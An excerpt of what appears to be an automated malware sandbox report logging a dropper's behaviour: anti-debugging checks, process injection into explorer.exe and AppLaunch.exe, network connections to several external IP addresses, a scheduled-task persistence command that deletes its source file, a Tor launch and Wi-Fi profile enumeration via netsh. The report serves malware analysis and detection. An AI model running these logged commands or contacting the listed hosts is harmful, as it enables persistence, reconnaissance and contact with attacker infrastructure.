Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01051030 mov eax, dword ptr fs:[00000030h]	6_2_01051030
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045210 mov eax, dword ptr fs:[00000030h]	6_2_01045210
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850 mov eax, dword ptr fs:[00000030h]	6_2_01045850
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850 mov eax, dword ptr fs:[00000030h]	6_2_01045850
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850 mov eax, dword ptr fs:[00000030h]	6_2_01045850
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850 mov eax, dword ptr fs:[00000030h]	6_2_01045850
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850 mov eax, dword ptr fs:[00000030h]	6_2_01045850
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850 mov eax, dword ptr fs:[00000030h]	6_2_01045850
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850 mov eax, dword ptr fs:[00000030h]	6_2_01045850
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850 mov eax, dword ptr fs:[00000030h]	6_2_01045850
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850 mov eax, dword ptr fs:[00000030h]	6_2_01045850
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850 mov eax, dword ptr fs:[00000030h]	6_2_01045850
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850 mov eax, dword ptr fs:[00000030h]	6_2_01045850
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850 mov eax, dword ptr fs:[00000030h]	6_2_01045850

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\932079.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe

Code function: 3_2_0090819D IsDebuggerPresent,

3_2_0090819D

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe

Code function: 6_2_00E87455 GetProcessHeap,

6_2_00E87455

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 5_2_0C8C1F18 LdrInitializeThunk,

5_2_0C8C1F18

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Code function: 0_2_00FC6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FC6CF0
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Code function: 0_2_00FC6F40 SetUnhandledExceptionFilter,	0_2_00FC6F40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Code function: 1_2_004C6F40 SetUnhandledExceptionFilter,	1_2_004C6F40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Code function: 1_2_004C6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_004C6CF0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Code function: 2_2_00ED6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00ED6CF0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Code function: 2_2_00ED6F40 SetUnhandledExceptionFilter,	2_2_00ED6F40
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008CC441 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_008CC441
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_0087C61C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0087C61C
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_0087B1E6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0087B1E6
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_0087B1E6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0087B1E6
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E869FB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00E869FB
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E82874 Concurrency::cancel_current_task,IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00E82874
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E82874 Concurrency::cancel_current_task,IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00E82874
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E82874 Concurrency::cancel_current_task,IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00E82874
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E86C9E SetUnhandledExceptionFilter,	6_2_00E86C9E

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 194.49.94.145 80
Source: C:\Windows\explorer.exe	Network Connect: 194.49.94.210 80
Source: C:\Windows\explorer.exe	Network Connect: 194.49.94.120 80
Source: C:\Windows\explorer.exe	Network Connect: 5.42.65.80 80
Source: C:\Windows\explorer.exe	Network Connect: 185.196.9.161 80
Source: C:\Windows\explorer.exe	Network Connect: 194.49.94.72 80

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 853C.exe.11.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 550000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Memory written: C:\Users\user\AppData\Local\Temp\D9EC.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Memory written: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe base: 400000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe

Code function: 3_2_0085F020 CreateProcessW,VirtualAllocEx,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

3_2_0085F020

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe

Thread created: C:\Windows\explorer.exe EIP: 3121970

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 42E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 43A000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 3ED008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 506000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 539000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 53D000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 53E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 51F2008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 550000
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 7E9008

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Thread register set: target process: 5268
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Thread register set: target process: 4556

Source: C:\Users\user\AppData\Local\Temp\8F82.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "8f82" /sc minute /tr "c:\users\user\appdata\local\windowssecurity\8f82.exe" /rl limited /f && del /f /s /q /a "c:\users\user\appdata\local\temp\8f82.exe" &&start "" "c:\users\user\appdata\local\windowssecurity\8f82.exe
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "8f82" /sc minute /tr "c:\users\user\appdata\local\windowssecurity\8f82.exe" /rl limited /f && del /f /s /q /a "c:\users\user\appdata\local\temp\8f82.exe" &&start "" "c:\users\user\appdata\local\windowssecurity\8f82.exe

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "8F82" /sc MINUTE /tr "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\8F82.exe" &&START "" "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "8F82" /sc MINUTE /tr "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" /rl LIMITED /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe"
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\ixas4a6gsv\tor\torrc.txt
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Process created: C:\Users\user\AppData\Local\Temp\D9EC.exe C:\Users\user\AppData\Local\Temp\D9EC.exe
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Process created: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe "C:\Users\user\AppData\Local\Temp\InstallSetup5.exe"
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

Code function: 0_2_00FC17EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,

0_2_00FC17EE

Source: explorer.exe, 0000000B.00000000.1720850365.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.1721776924.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1724220007.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.1720850365.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.1720193511.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 0000000B.00000000.1720850365.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.1720850365.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: EnumSystemLocalesW,	3_2_00900195
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: GetLocaleInfoW,	3_2_00900CF0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: GetLocaleInfoEx,FormatMessageA,	3_2_00889AA1
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: GetLocaleInfoEx,	3_2_008AA66A
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: EnumSystemLocalesW,	3_2_0090AFE5
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: EnumSystemLocalesW,	3_2_0090AF63
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: EnumSystemLocalesW,	3_2_0090B0A6
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_0090B153
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: GetLocaleInfoW,	3_2_0090B43A
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0090B5AD
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: GetLocaleInfoW,	3_2_0090B6F4
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_0090B7F6
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: EnumSystemLocalesW,	3_2_008FFFA6
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: GetLocaleInfoW,	6_2_00E82EAA
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: GetLocaleInfoW,	6_2_00E82EAA
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: GetLocaleInfoEx,FormatMessageA,	6_2_00E8178A
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: EnumSystemLocalesW,	6_2_00F2FFA6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\7FE0.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\8427.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
